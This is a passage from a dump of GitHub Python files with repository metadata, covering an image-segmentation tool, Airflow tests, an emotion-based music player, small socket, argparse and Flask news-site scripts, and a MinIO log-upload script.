set_mouse_cb(self, cb):\n if cb is None:\n cv.setMouseCallback(self.app.inwin_name, self._empty_cb)\n return\n\n cv.setMouseCallback(self.app.inwin_name, cb)\n\n\nclass Crop(AppState):\n def __init__(self, app: \"IGrabcut\"):\n super().__init__(app)\n self.name = \"crop\"\n\n # upper left corner, lower right corner\n self.p1, self.p2 = None, None\n\n self.set_mouse_cb(self.mouse_cb)\n\n self.drawing = False\n self.done = False\n\n def __call__(self):\n if self.done:\n return self.app.prev_app_state\n\n return self\n\n @store_cursor_pos\n def mouse_cb(self, event, x, y, flags, params):\n if event == cv.EVENT_LBUTTONDOWN:\n self.drawing = True\n self.init_rect(x, y)\n elif event == cv.EVENT_LBUTTONUP:\n self.drawing = False\n self.crop()\n self.done = True\n elif event == cv.EVENT_MOUSEMOVE and self.drawing:\n self.update_rect(x, y)\n\n def init_rect(self, x, y):\n self.p1 = (x, y)\n self.p2 = (x, y)\n self.render()\n\n def update_rect(self, x, y):\n self.p2 = (x, y)\n self.render()\n\n def crop(self):\n img = self.app.img\n\n x1, y1 = self.p1\n x2, y2 = self.p2\n\n xmin, xmax = min(x1, x2), max(x1, x2)\n ymin, ymax = min(y1, y2), max(y1, y2)\n\n # region of interest; the inside of the crop\n roi = img[ymin:ymax, xmin:xmax]\n\n # everything background, except roi\n img = np.zeros_like(img)\n img[y1:y2, x1:x2] = roi\n\n self.app.img = img\n\n if self.app._mask is None:\n self.app._mask = np.zeros(img.shape[:2], dtype=np.uint8)\n\n self.app._mask[y1:y2, x1:x2] = Mask.probably_fg\n self.app._crop = (x1, y1, x2 - x1, y2 - y1)\n\n self.render()\n\n def render(self):\n img = self.app.img\n cv.rectangle(img, self.p1, self.p2, colors.black)\n self.app._show_img = img\n\n\nclass IncreseBrush(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"increase brush\"\n\n def __call__(self):\n self.app._brush_size += 2\n return self.app.prev_app_state\n\n\nclass DecreaseBrush(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"decrease brush\"\n\n def __call__(self):\n # TODO maybe config\n if self.app._brush_size > 1:\n self.app._brush_size -= 2\n\n return self.app.prev_app_state\n\n\nclass DrawGround(AppState):\n def __init__(self, app, color, value, Derived):\n super().__init__(app)\n self.color = color\n self.value = value\n self.Derived = Derived\n self.drawing = False\n\n self.set_mouse_cb(self.mouse_cb)\n\n if self.app._mask is None:\n self.app._mask = np.zeros(self.app._img.shape[:2], dtype=np.uint8)\n\n def __call__(self):\n return self\n\n @store_cursor_pos\n def mouse_cb(self, event, x, y, *args):\n if event == cv.EVENT_LBUTTONDOWN:\n self.drawing = True\n self.draw(x, y)\n self.render()\n elif event == cv.EVENT_LBUTTONUP:\n self.drawing = False\n self.render()\n elif event == cv.EVENT_MOUSEMOVE and self.drawing:\n self.draw(x, y)\n self.render()\n\n def draw(self, x, y):\n # TODO thickness?\n self.app.img = cv.circle(\n self.app._img, (x, y), self.app._brush_size // 2, self.color, -1\n )\n self.app._mask = cv.circle(\n self.app._mask, (x, y), self.app._brush_size // 2, self.value, -1\n )\n\n def render(self):\n self.app._show_img = self.app.img\n\n\nclass DrawForeground(DrawGround):\n def __init__(self, app):\n super().__init__(app, colors.blue, Mask.fg, DrawForeground)\n self.name = \"foreground\"\n\n\nclass DrawProbablyForeground(DrawGround):\n def __init__(self, app):\n super().__init__(app, colors.cyan, Mask.probably_fg, DrawProbablyForeground)\n self.name = \"probably foreground\"\n\n\nclass DrawBackground(DrawGround):\n def __init__(self, app):\n super().__init__(app, colors.red, Mask.bg, DrawBackground)\n self.name = \"background\"\n\nclass DrawProbablyBackground(DrawGround):\n def __init__(self, app):\n super().__init__(app, colors.pink, Mask.bg, DrawProbablyBackground)\n self.name = \"probably background\"\n\n\nclass Reset(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"reset\"\n\n def __call__(self):\n self.app.img = self.app._original_img.copy()\n self.app._show_img = self.app.img\n\n return BaseState(self.app)\n\n\nclass Grabcut(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"grabcut\"\n\n def __call__(self):\n if self.app._mask is None:\n print(\"No mask set, either crop the img, or draw bg / fg.\")\n return self.app.prev_app_state\n\n mask, bg_model, fg_model = cv.grabCut(\n self.app._original_img.copy(),\n self.app._mask,\n self.app._crop,\n self.app._bg_model,\n self.app._fg_model,\n 5,\n cv.GC_INIT_WITH_MASK,\n )\n\n # TODO what is happening here? seems kinda wrong\n # mask = np.uint8(np.where((mask == Mask.bg) | (mask == Mask.probably_bg), 0, 1))\n # mask = np.logical_or(mask[mask == Mask.fg], mask[mask == Mask.probably_fg])\n mask = np.uint8((mask == Mask.fg) | (mask == Mask.probably_fg))\n mask = mask[..., np.newaxis]\n\n # store mask in the app\n self.app._saved_mask = mask.copy()\n\n self.app._fg_img = self.app._original_img * mask\n self.app._fg_img[np.logical_not(mask[:, :, 0])] = colors.red\n\n\n return self.app.prev_app_state if not self.app.auto_save else Save(self.app)\n\n\nclass Close(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"close\"\n\n def __call__(self):\n cv.destroyAllWindows()\n return self\n\n\nclass GenerateMask(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"mask generator\"\n\n def __call__(self):\n if self.app.mask_generator is None:\n print(\"Please set the mask_generator.\")\n return self.app.prev_app_state\n\n # generate mask from user defined function\n mask = self.app.mask_generator(self.app.img)\n\n self.app._mask = mask\n # TODO only if img has 3 channels\n self.app._img = self.app._img * (mask != 0)[..., np.newaxis]\n self.app._show_img = self.app.img\n\n return self.app.prev_app_state\n\n\nclass Save(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"save\"\n\n def __call__(self):\n basename = os.path.basename(self.app._img_path)\n name, ext = os.path.splitext(basename)\n\n # TODO name into init\n path = Path(self.app.output_dir) / f\"{name}_fg_mask{ext}\"\n cv.imwrite(str(path), self.app._saved_mask)\n print(f\"Saving to {path}.\")\n\n return self.app.prev_app_state\n\n\nclass Delete(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"delete\"\n\n def __call__(self):\n # TODO merge with save\n basename = os.path.basename(self.app._img_path)\n name, ext = os.path.splitext(basename)\n\n path = Path(self.app.output_dir) / f\"{name}_fg{ext}\"\n if os.path.exists(path):\n os.remove(path)\n print(f\"Deleted {path}.\")\n else:\n print(f\"{path} does not exist.\")\n\n return self.app.prev_app_state\n\n\nclass BaseState(AppState):\n \"\"\" State to switch between states \"\"\"\n\n _states = {\n Hotkeys.crop: Crop,\n Hotkeys.inc_brush: IncreseBrush,\n Hotkeys.dec_brush: DecreaseBrush,\n Hotkeys.grabcut: Grabcut,\n Hotkeys.foreground: DrawForeground,\n Hotkeys.background: DrawBackground,\n Hotkeys.reset: Reset,\n }\n\n def __init__(self, app):\n super().__init__(app)\n self.name = \"base\"\n\n self.set_mouse_cb(self.mouse_cb)\n\n def __call__(self):\n return self.app.app_state\n\n @store_cursor_pos\n def mouse_cb(self, *args):\n pass\n\n\nclass IGrabcut:\n # fmt: off\n _states = {\n Hotkeys.grabcut: Grabcut,\n Hotkeys.crop: Crop,\n Hotkeys.foreground: DrawForeground,\n Hotkeys.probably_foreground: DrawProbablyForeground,\n Hotkeys.background: DrawBackground,\n Hotkeys.probably_background: DrawProbablyBackground,\n Hotkeys.mask_generator: GenerateMask,\n\n Hotkeys.inc_brush: IncreseBrush,\n Hotkeys.dec_brush: DecreaseBrush,\n\n Hotkeys.save: Save,\n Hotkeys.delete: Delete,\n Hotkeys.reset: Reset,\n Hotkeys.close: Close,\n }\n # fmt: on\n\n def __init__(\n self,\n output_dir: Union[Path, str],\n auto_save: bool = True,\n inwin_name=\"input\",\n outwin_name=\"output\",\n waitkey_delay=1,\n ):\n self.app_state = None\n self.waitkey_delay = waitkey_delay\n\n # windows\n self.inwin_name = inwin_name\n self.outwin_name = outwin_name\n\n # output\n self.auto_save = auto_save\n self.output_dir = output_dir\n\n # TODO naming function\n\n # images\n self._img_path = None\n self._original_img = None\n self._img = None\n self._show_img = None\n self._fg_img = None\n # TODO ?\n self._bg_img = None\n\n # ui\n self._cursor_pos = (0, 0)\n self._brush_size = 19\n\n # grabcut\n self.mask_generator = None\n self._mask = None\n self._crop = None\n self._bg_model = np.zeros((1, 65), dtype=np.float64)\n self._fg_model = np.zeros((1, 65), dtype=np.float64)\n\n def imread(self, path: Union[Path, str], resize: int, channels: int = 3):\n self._img_path = str(path)\n\n color_type = cv.IMREAD_GRAYSCALE if channels == 1 else None\n img = cv.imread(self._img_path, color_type)\n img = utils.resize_max_axis(img, resize)\n\n self._img = img\n self._original_img = self.img\n self._show_img = self.img\n self._fg_img = self.img\n\n def run(self, path: Union[Path, str], resize=1000):\n self.imread(path, resize)\n\n cv.namedWindow(self.outwin_name, cv.WINDOW_AUTOSIZE)\n cv.namedWindow(self.inwin_name, cv.WINDOW_AUTOSIZE)\n\n self.app_state = BaseState(self)\n\n while self.app_state.name != \"close\":\n\n img = self._show_img.copy()\n img = self.render_state(img)\n img = self.render_brush(img)\n img = self.render_cross(img)\n\n cv.imshow(self.inwin_name, img)\n cv.imshow(self.outwin_name, self._fg_img)\n\n # apply the current state\n self.app_state = self.app_state()\n\n key = self.pressed_key\n if key not in self._states:\n continue\n\n State = self._states[key]\n # some states restore the state after they we're applied, hence store\n # the old one\n self.prev_app_state = deepcopy(self.app_state)\n\n # initialize the new state\n self.app_state = State(self)\n\n @property\n def pressed_key(self):\n return 0xFF & cv.waitKey(self.waitkey_delay)\n\n @property\n def img(self):\n return self._img.copy()\n\n @img.setter\n def img(self, other):\n self._img = other\n\n # TODO all into seperate renderer\n def render_state(self, img):\n img = cv.putText(\n img,\n self.app_state.name,\n (10, 20),\n cv.FONT_HERSHEY_SIMPLEX,\n 1,\n colors.red,\n 2,\n cv.LINE_8,\n )\n return img\n\n def render_brush(self, img):\n img = cv.circle(\n img, self._cursor_pos, self._brush_size // 2, colors.red, 2, cv.LINE_8\n )\n return img\n\n def render_cross(self, img):\n h, w = img.shape[:2]\n\n xcur, ycur = self._cursor_pos\n\n left, right = (0, ycur), (w - 1, ycur)\n img = cv.line(img, left, right, colors.red, 1)\n\n top, bot = (xcur, 0), (xcur, h - 1)\n img = cv.line(img, top, bot, colors.red, 1)\n\n return img\n","repo_name":"Dimfred/masterthesis","sub_path":"code/utils/igrabcut.py","file_name":"igrabcut.py","file_ext":"py","file_size_in_byte":13794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"32689833023","text":"from __future__ import annotations\n\nimport pendulum\nimport pytest\n\nfrom airflow.settings import TIMEZONE\nfrom airflow.timetables.base import DagRunInfo, DataInterval, TimeRestriction, Timetable\nfrom airflow.timetables.events import EventsTimetable\n\nSTART_DATE = pendulum.DateTime(2021, 9, 4, tzinfo=TIMEZONE) # Precedes all events\n\nEVENT_DATES = [\n pendulum.DateTime(2021, 9, 6, tzinfo=TIMEZONE),\n pendulum.DateTime(2021, 9, 7, tzinfo=TIMEZONE),\n pendulum.DateTime(2021, 9, 8, tzinfo=TIMEZONE),\n pendulum.DateTime(2021, 9, 8, tzinfo=TIMEZONE), # deliberate duplicate, should be ignored\n pendulum.DateTime(2021, 10, 9, tzinfo=TIMEZONE), # deliberately out of order\n pendulum.DateTime(2021, 9, 10, tzinfo=TIMEZONE),\n]\n\nEVENT_DATES_SORTED = [\n pendulum.DateTime(2021, 9, 6, tzinfo=TIMEZONE),\n pendulum.DateTime(2021, 9, 7, tzinfo=TIMEZONE),\n pendulum.DateTime(2021, 9, 8, tzinfo=TIMEZONE),\n pendulum.DateTime(2021, 9, 10, tzinfo=TIMEZONE),\n pendulum.DateTime(2021, 10, 9, tzinfo=TIMEZONE),\n]\n\nNON_EVENT_DATE = pendulum.DateTime(2021, 10, 1, tzinfo=TIMEZONE)\nMOST_RECENT_EVENT = pendulum.DateTime(2021, 9, 10, tzinfo=TIMEZONE)\n\n\n@pytest.fixture()\ndef restriction():\n return TimeRestriction(earliest=START_DATE, latest=None, catchup=True)\n\n\n@pytest.fixture()\ndef unrestricted_timetable():\n return EventsTimetable(event_dates=EVENT_DATES)\n\n\n@pytest.fixture()\ndef restricted_timetable():\n return EventsTimetable(event_dates=EVENT_DATES, restrict_to_events=True)\n\n\n@pytest.mark.parametrize(\n \"start, end\",\n list(zip(EVENT_DATES, EVENT_DATES)),\n)\ndef test_dag_run_info_interval(start: pendulum.DateTime, end: pendulum.DateTime):\n expected_info = DagRunInfo(run_after=end, data_interval=DataInterval(start, end))\n assert DagRunInfo.interval(start, end) == expected_info\n\n\ndef test_manual_with_unrestricted(unrestricted_timetable: Timetable, restriction: TimeRestriction):\n \"\"\"When not using strict event dates, manual runs have run_after as the data interval\"\"\"\n manual_run_data_interval = unrestricted_timetable.infer_manual_data_interval(run_after=NON_EVENT_DATE)\n expected_data_interval = DataInterval.exact(NON_EVENT_DATE)\n assert expected_data_interval == manual_run_data_interval\n\n\ndef test_manual_with_restricted_middle(restricted_timetable: Timetable, restriction: TimeRestriction):\n \"\"\"\n Test that when using strict event dates, manual runs after the first event have the\n most recent event's date as the start interval\n \"\"\"\n manual_run_data_interval = restricted_timetable.infer_manual_data_interval(run_after=NON_EVENT_DATE)\n expected_data_interval = DataInterval.exact(MOST_RECENT_EVENT)\n assert expected_data_interval == manual_run_data_interval\n\n\ndef test_manual_with_restricted_before(restricted_timetable: Timetable, restriction: TimeRestriction):\n \"\"\"\n Test that when using strict event dates, manual runs before the first event have the first event's date\n as the start interval\n \"\"\"\n manual_run_data_interval = restricted_timetable.infer_manual_data_interval(run_after=START_DATE)\n expected_data_interval = DataInterval.exact(EVENT_DATES[0])\n assert expected_data_interval == manual_run_data_interval\n\n\n@pytest.mark.parametrize(\n \"last_automated_data_interval, expected_next_info\",\n [\n pytest.param(DataInterval(day1, day1), DagRunInfo.interval(day2, day2))\n for day1, day2 in zip(EVENT_DATES_SORTED, EVENT_DATES_SORTED[1:])\n ]\n + [pytest.param(DataInterval(EVENT_DATES_SORTED[-1], EVENT_DATES_SORTED[-1]), None)],\n)\ndef test_subsequent_weekday_schedule(\n unrestricted_timetable: Timetable,\n restriction: TimeRestriction,\n last_automated_data_interval: DataInterval,\n expected_next_info: DagRunInfo,\n):\n \"\"\"The next four subsequent runs cover the next four weekdays each.\"\"\"\n next_info = unrestricted_timetable.next_dagrun_info(\n last_automated_data_interval=last_automated_data_interval,\n restriction=restriction,\n )\n assert next_info == expected_next_info\n","repo_name":"a0x8o/airflow","sub_path":"tests/timetables/test_events_timetable.py","file_name":"test_events_timetable.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"22009540421","text":"process_this_frame = True\nba={\n 'Chaarz,Happy':'Nenjil Nenjil.mp3',\n'KarthikM,Surprised':'ASirikkalamParakkalamMassTamilanioMusic.mp3',\n'karthika,Happy':'03 Chillax.mp3',\n'keerthanaD,Happy':'DARBARTamilChummaKizhiLyricVideoRajinikanthARMurugadossRingtone.mp3',\n'Dr.K.Kousalya,Happy':'Singapenne.mp3',\n}\ndef fv(frame=None):\n global last,process_this_frame\n # if frame and not frame.any():\n img=frame\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\n # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n rgb_small_frame = small_frame[:, :, ::-1]\n name='Unknown'\n # Only process every other frame of video to save time\n if process_this_frame or 1:\n # Find all the faces and face encodings in the current frame of video\n face_locations = face_recognition.face_locations(rgb_small_frame)\n face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n\n face_names = []\n for face_encoding in face_encodings:\n # See if the face is a match for the known face(s)\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding)\n name = \"Unknown\"\n\n # # If a match was found in known_face_encodings, just use the first one.\n # if True in matches:\n # first_match_index = matches.index(True)\n # name = known_face_names[first_match_index]\n\n # Or instead, use the known face with the smallest distance to the new face\n face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)\n best_match_index = np.argmin(face_distances)\n if matches[best_match_index]:\n name = known_face_names[best_match_index]\n\n face_names.append(name)\n\n process_this_frame = not process_this_frame\n\n\n # Display the results\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n # Scale back up face locations since the frame we detected in was scaled to 1/4 size\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n # Draw a label with a name below the face\n cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n \n facecasc = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = facecasc.detectMultiScale(gray,scaleFactor=1.3, minNeighbors=5)\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y-50), (x+w, y+h+10), (255, 0, 0), 2)\n roi_gray = gray[y:y + h, x:x + w]\n cropped_img = np.expand_dims(np.expand_dims(cv2.resize(roi_gray, (48, 48)), -1), 0)\n prediction = model.predict(cropped_img)\n maxindex = int(np.argmax(prediction))\n if maxindex!=last and 0:\n if maxindex==3:\n threading.Thread(play('03 Chillax.mp3'))\n elif maxindex==5:\n threading.Thread(play('06.Nenjil Nenjil.mp3'))\n else:\n threading.Thread(play('06.Nenjil Nenjil.mp3'))\n last=maxindex\n # threading.Thread(play(ba.get(f'{name.split(\".\")[0]},{emotion_dict[maxindex]}','03 Chillax.mp3')))\n \n\n print(name,emotion_dict[maxindex])\n sleep(5)\n # cv2.putText(frame, emotion_dict[maxindex], (x+20, y-60), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)\n # cv2.imshow('Video', cv2.resize(frame,(1600,960),interpolation = cv2.INTER_CUBIC))\n \nfor file in os.listdir('fr/u/'):\n print(file)\n fv(cv2.imread(f'fr/u/{file}')) \n\n \n# emotions will be displayed on your face from the webcam feed\nif mode == \"display\" or 0:\n # start the webcam feed\n cap = cv2.VideoCapture(0)\n while True:\n # Find haar cascade to draw bounding box around face\n ret, frame = cap.read()\n if not ret:\n break\n fv(frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()","repo_name":"karthikkec/Personalised-music-recommendation-system","sub_path":"emotions.py","file_name":"emotions.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18958978112","text":"# MULTIPLICACION DE 2 MATRICES\n\n# FILAS MAT A\nFILAS_A=int(input(\"Introduce número de filas para MATRIZ A: \"))\nprint(\"\\n\")\n\n# COLUMNAS MAT A\nCOLUMNAS_A=int(input(\"Introduce número de columnas para MATRIZ A: \"))\nprint(\"\\n\")\n\n# COLUMNAS MAT B\n\"\"\"\n (porque para vida de multiplicar matrices, el numero de columnas de \n la primera matriz, debe ser igual al numero de filas de la segunda)\n\"\"\"\nCOLUMNAS_B=int(input(\"Introduce numero de columnas para MATRIZ B: \"))\nprint(\"\\n\")\n\n# MATRIZ A (inicializada en ceros)\nA=[]\nfor i in range(FILAS_A):\n # con append agrega ceros en el arreglo creado para A\n A.append([0]*COLUMNAS_A)\n\n# MATRIZ B (inicializada en ceros)\nB=[]\nfor i in range(COLUMNAS_A):\n # con append agrega ceros en el arreglo creado para B\n B.append([0]*COLUMNAS_B)\n\n# INTRODUCE VALORES PARA MATRIZ A\nfor i in range(FILAS_A):\n for j in range(COLUMNAS_A):\n A[i][j]=float(input(\"Introduce los valores de A en (%d, %d): \" % (i,j)))\n\n# INTRODUCE VALORES PARA MATRIZ B\nprint(\"\\n\")\nfor i in range(COLUMNAS_A):\n for j in range(COLUMNAS_B):\n B[i][j]=float(input(\"Introduce los valores de B en (%d, %d): \" % (i,j)))\n\n# MATRIZ C (inicializada en ceros, aqui se guardará el resultado de A x B)\nC=[]\nfor i in range(FILAS_A):\n # con append agrega ceros en el arreglo creado para C\n C.append([0]*COLUMNAS_B)\n\n# MULTIPLICACION DE MATRICES A y B\n\nfor i in range(FILAS_A):\n for j in range(COLUMNAS_B):\n for k in range(COLUMNAS_A):\n C[i][j] += A[i][k] * B[k][j]\n\n# MATRIZ FINALE\n\nprint(\"\\n MATRIZ RESULTANTE: \\n\")\n\nfor i in range(FILAS_A):\n R=[]\n for j in range(COLUMNAS_B):\n # con append agrega los valores de C en el nuevo arreglo R\n R.append(C[i][j])\n print(R)\nprint(\"\\n\")\n","repo_name":"miguel-respaldo/bootcamp-post-si","sub_path":"20220107/alejandro.cano/matrices.py","file_name":"matrices.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"30091529780","text":"import sys,struct,socket\r\n\r\ndef nbyte_to_data(sock):\r\n size_info={'B':1,'H':2,'L':4,'Q':8,'d':8}\r\n \r\n tag=sock.recv(1).decode('utf-8')\r\n if not tag:\r\n return False\r\n else:\r\n if tag in size_info:\r\n size=size_info[tag]\r\n data=sock.recv(size)\r\n message=struct.unpack('!'+tag,data)[0]\r\n elif tag in 'sc':\r\n length=nbyte_to_data(sock)\r\n data=sock.recv(length)\r\n message=data.decode('utf-8')\r\n \r\n return message\r\ndef server(ip,port):\r\n listensock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n listensock.bind((ip,port))\r\n listensock.listen(5)\r\n \r\n sock,sockname=listensock.accept()\r\n while True:\r\n message=nbyte_to_data(sock)\r\n if not message:\r\n break\r\n else:\r\n print('receive %s from %s'%(message,sockname))\r\n \r\n sock.close()\r\n listensock.close()\r\n \r\nif len(sys.argv)!=3:\r\n print('Wrong format')\r\nelse:\r\n ip=sys.argv[1]\r\n port=int(sys.argv[2])\r\n server(ip,port)","repo_name":"eeeXun/homework","sub_path":"semester2/socket/TLV_Server.py","file_name":"TLV_Server.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74014262179","text":"import sqlite3\nimport io\nfrom minio import Minio\n\ncon = sqlite3.connect(\"database.sqlite\")\ncur = con.cursor()\n\n\nurl = \"play.minio.io\"\naccess_key = \"\"\nsecret_key = \"\"\nbucket = \"drone-logs\"\n\nclient = Minio(\n url,\n access_key=access_key,\n secret_key=secret_key,\n )\n\nobjects = [obj.object_name for obj in client.list_objects(\"drone\")]\nimport sys; sys.exit(1)\nfor row in cur.execute('select * from logs'):\n print(f'Moved {row[0]: 7}', end='\\r')\n client.put_object(\n bucket, str(row[0]), io.BytesIO(row[1]), content_type='binary/octet-stream', length=len(row[1]), \n )\ncur.execute('delete from logs')\ncon.close()\nprint('finished')\n","repo_name":"m42e/move-drone-ci-logs","sub_path":"move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"40122093236","text":"from info import response_code, constants\nfrom info.models import User, News, Category\nfrom info.modules.index import index_blu\nfrom flask import render_template, current_app, session, request, jsonify\nfrom info.utils.comment import user_login_data, g\n\n@index_blu.route('/news_list')\ndef index_news_list():\n \"\"\"提供主页新闻列表的数据\n 1 接受参数\n 2 检验参数\n 3 根据参数查询用户想看的新闻列表数据\n 4 构造响应的新闻列表数据\n 5 响应新闻列表数据\n \"\"\"\n # 1 接受参数\n args_dict = request.args\n page = args_dict.get('page', '1')\n per_page = args_dict.get('per_page', constants.HOME_PAGE_MAX_NEWS)\n category_id = args_dict.get('cid', '1')\n\n # 2 检验参数\n try:\n page = int(page)\n per_page = int(per_page)\n category_id = int(category_id)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=response_code.RET.PARAMERR, errmsg=\"参数错误\")\n\n # 3 根据参数查询用户想看的新闻列表数据\n\n # 如果分类id不为1,那么添加分类id的过滤\n try:\n if category_id == 1:\n # 从所有新闻中,根据时间倒序,每页取出10条数据\n paginate = News.query.order_by(News.create_time.desc()).paginate(page,per_page,False)\n\n else:\n # 从指定的分类中查询新闻根据时间倒序每页取10条数据\n paginate = News.query.filter(News.category_id==category_id).order_by(News.create_time.desc()).paginate(page, per_page, False)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=response_code.RET.DBERR, errmsg=\"数据查询失败\")\n # 获取查询出来的数据\n items = paginate.items\n # 获取到总页数\n total_page = paginate.pages\n # 获取当前所在页码\n current_page = paginate.page\n\n news_li = []\n for news in items:\n news_li.append(news.to_basic_dict())\n\n data = {\n 'news_li':news_li,\n 'total_page':total_page,\n 'current_page':current_page\n }\n\n\n # 返回数据\n return jsonify(errno=response_code.RET.OK, errmsg=\"ok\", data = data)\n\n\n@index_blu.route('/')\n@user_login_data\ndef index():\n \"\"\"首页\n 1.处理网页右上角用户展示数据\n 2.新闻点击排行的展示\n 3.新闻分类\n \"\"\"\n # redis_store.set(\"name\",'zxc')\n # 1.处理网页右上角用户展示数据\n # user_id = session.get('user_id', None)\n # user = None\n # if user_id:\n # # 表示用户已经登录,然后查询用户信息\n # try:\n # user = User.query.get(user_id)\n # except Exception as e:\n # current_app.logger.error(e)\n\n # 2.新闻点击排行的展示\n try:\n new_clicks = News.query.order_by(News.clicks.desc()).limit(constants.CLICK_RANK_MAX_NEWS)\n except Exception as e:\n current_app.logger.error(e)\n\n\n # 获取新闻分类\n categories = Category.query.all()\n # 定义列表保存分类数据\n categories_dicts = []\n\n\n for category in categories:\n # 拼接内容\n categories_dicts.append(category.to_dict())\n\n\n # 构造渲染模板上下文数据\n context = {\n 'user':g.user.to_dict() if g.user else None,\n 'new_clicks':new_clicks,\n 'categories_dicts':categories_dicts\n }\n\n\n return render_template('news/index.html', context = context)\n\n\n@index_blu.route('/favicon.ico', methods=['GET'])\ndef favicon():\n \"\"\"title左侧图标\"\"\"\n return current_app.send_static_file('news/favicon.ico')","repo_name":"WangLei0106/info_news","sub_path":"info/modules/index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36788959968","text":"import argparse\n\nparser = argparse.ArgumentParser(prog='ArgTry',\n usage='%(prog)s [options]',\n description='Description for command parser.',\n epilog='End of message.',\n prefix_chars='+/-')\n\n# parser.add_argument('first_num', type=float, help='First num for add.')\n# parser.add_argument('second_num', type=float, help='Second num for add.')\n# parser.add_argument('string_arg', help='Second num for add.')\nparser.add_argument('-l', '--list', type=float, help='Optional l args', dest='whitelist')\nparser.add_argument('-v', '--verbosity', action='store_false', help='Optional v args')\nparser.add_argument('-q', '--quit', nargs=2, help='Optional q args')\nparser.add_argument('-w', '--web', nargs='?', default=34, const=23, help='Optional w args')\n\nparser.add_argument('-tp', '--type', choices={'basic', 'premium', 'simple'}, help='Optional tp args')\nparser.add_argument('-f', '--face', action='append', help='Optional v args')\nparser.add_argument('-z', '--zip', action='append_const', const=1, help='Optional v args', dest='zc')\nparser.add_argument('-c', '--cut', action='append_const', const=2, help='Optional v args', dest='zc')\n\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument('-t', '--take', nargs='*', default=[1], help='Optional t args')\ngroup.add_argument('-e', '--exit', nargs='+', default=[1], help='Optional e args')\n\nsubparsers = parser.add_subparsers()\nparser_sub =subparsers.add_parser('div')\nparser_sub.add_argument('first_n', type=float, help='first num help div')\nparser_sub.add_argument('second_n', type=float, help='second num help div')\n\n\nargs = parser.parse_args()\n\nprint(args.first_n/args.second_n)\n\n# print(args.first_num)\n# print(args.whitelist)\n# print(args.first_num+args.second_num)\nprint(args.__dict__)\n\n\nparent_parser = argparse.ArgumentParser(prog='parent', description='description for parent', add_help=False)\n\nparent_parser.add_argument('path', help='help str for path')\n\n\nparser_1 = argparse.ArgumentParser(prog='parser_1', description='Parser_1 description', parents=[parent_parser])\nparser_1.add_argument('-a', type=int, help='help str for -a')\n\nargs_1 = parser_1.parse_args(['path/to/file_1', '-a', '1'])\n# print(args_1.__dict__)\n\nparser_2 = argparse.ArgumentParser(prog='parser_2', description='Parser_2 description', parents=[parent_parser])\nparser_2.add_argument('-s', type=int, help='help str for -s')\nargs_2 = parser_2.parse_args(['path/to/file_2', '-s', '1'])\n# print(args_2.__dict__)","repo_name":"VachaganGrigoryan/aca-python","sub_path":"sunday-morning-main/28_02_21/argparse_try.py","file_name":"argparse_try.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41585547392","text":"import os\nimport numpy as np\nimport scipy.signal\nimport warnings\nfrom scipy.fft import fft, ifft\n\nfrom ...scattering1d.refining import smart_paths_exclude\nfrom ...scattering1d.frontend.frontend_utils import _check_jax_double_precision\nfrom ...utils.gen_utils import npy\nfrom ...utils.measures import compute_filter_redundancy, compute_bandwidth\nfrom .misc import energy\n\ntry:\n from tqdm import trange\nexcept: # no-cov\n trange = None\n\n\ndef fit_smart_paths(sc, x_all, e_loss_goal=.01, outs_dir=None, verbose=True):\n \"\"\"Configures `paths_exclude` to guarantee energy loss doesn't exceed set\n threshold on the provided dataset.\n\n Iterates `x_all` and dynamically adjusts `e_th` that's passed into\n `smart_paths()`, refining estimates to match `e_loss_goal`.\n\n Note, ignores existing `sc.paths_exclude`. If execution is forcibly\n interrupted repeatedly, the following attributes will be overwritten:\n `paths_exclude, 